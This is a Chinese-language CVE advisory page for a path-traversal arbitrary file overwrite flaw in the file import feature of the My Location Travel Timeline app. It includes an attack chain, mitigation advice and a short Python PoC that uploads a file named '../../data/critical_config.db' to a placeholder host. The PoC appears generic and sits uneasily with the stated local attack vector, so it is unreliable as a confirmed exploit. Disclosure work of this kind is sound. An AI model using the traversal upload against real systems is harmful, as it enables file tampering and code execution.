CVE-2026-30279 CVSS 8.4 高危

CVE-2026-30279 My Location Travel Timeline 任意文件覆盖漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30279

漏洞类型

任意文件覆盖

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Squareapps LLC My Location Travel Timeline

漏洞概述

Squareapps LLC开发的My Location Travel Timeline v11.80版本存在严重的安全漏洞。该漏洞被归类为任意文件覆盖漏洞，允许攻击者通过应用程序的文件导入功能，对系统内部的关键文件进行覆盖操作。成功利用此漏洞可能导致严重后果，包括但不限于敏感信息泄露以及在受影响系统上执行任意代码，从而完全威胁到系统的机密性、完整性和可用性。

技术细节

该漏洞的根本原因在于应用程序在处理文件导入请求时，未对目标文件路径进行充分的校验和过滤。攻击者无需经过身份认证（PR:N）且无需用户交互（UI:N），即可在本地访问场景下（AV:L）发起攻击。利用方式主要是通过构造包含路径遍历字符（如../）的恶意文件名或直接指定关键内部文件路径，在导入时将恶意内容写入。由于应用运行权限可能允许覆盖关键配置或二进制文件，攻击者可借此植入后门或修改应用逻辑，导致任意代码执行或数据窃取。

攻击链分析

STEP 1

1. 获取本地访问

攻击者获取对运行My Location Travel Timeline应用的设备的本地访问权限。

STEP 2

2. 构造恶意文件

攻击者构造包含恶意数据的文件，并指定文件上传路径为应用内部的关键文件路径（利用路径遍历或直接指定）。

STEP 3

3. 触发文件导入

攻击者通过应用程序的文件导入接口上传恶意文件，由于缺乏校验，应用将恶意内容写入并覆盖关键内部文件。

STEP 4

4. 执行攻击载荷

应用程序在后续运行中加载被篡改的文件，导致执行恶意代码或泄露敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Squareapps My Location Travel Timeline v11.80 - Arbitrary File Overwrite (PoC)
# Description: This script demonstrates how an attacker might overwrite a critical file.

# Target configuration
target_url = "http://target-host:port/api/import_file"

# The internal file to overwrite (e.g., a configuration or library file)
# Attackers may use path traversal techniques like '../../'
target_file = "../../data/critical_config.db"

# Malicious content to write
malicious_data = b"MALICIOUS_PAYLOAD_CONTENT"

files = {
    'file': (target_file, malicious_data, 'application/octet-stream')
}

try:
    response = requests.post(target_url, files=files)
    if response.status_code == 200:
        print("[+] File potentially overwritten successfully.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Squareapps LLC My Location Travel Timeline v11.80

防御指南

临时缓解措施

建议立即停止使用该版本的文件导入功能，直至厂商发布修复补丁。同时，应限制应用对系统关键目录的读写权限，并定期检查系统文件的完整性，以防止潜在的利用尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30279
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30279
3 Details https://www.cvedetails.com/cve/CVE-2026-30279/
4 VulDB https://vuldb.com/cve/CVE-2026-30279
5 Link http://my.com
6 Link https://github.com/Secsys-FDU/AF_CVEs/issues/28
7 Link https://lightapp3.firebaseapp.com/
8 Link https://secsys.fudan.edu.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表